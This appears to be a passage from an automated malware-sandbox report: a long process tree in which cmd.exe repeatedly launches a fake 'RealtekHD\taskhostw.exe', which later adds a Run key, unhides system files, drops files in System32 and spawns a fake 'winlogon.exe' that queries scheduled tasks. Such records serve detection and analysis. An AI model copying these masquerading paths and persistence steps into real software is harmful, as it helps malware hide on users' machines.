                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2424
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/gui/file/a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd/detection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4644
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Programdata\RealtekHD\taskhostw.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/gui/file/a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd/detection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/gui/file/a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd/detection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3152
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Programdata\RealtekHD\taskhostw.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies visiblity of hidden/system files in Explorer
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /C schtasks /query /fo list
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                schtasks /query /fo list
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
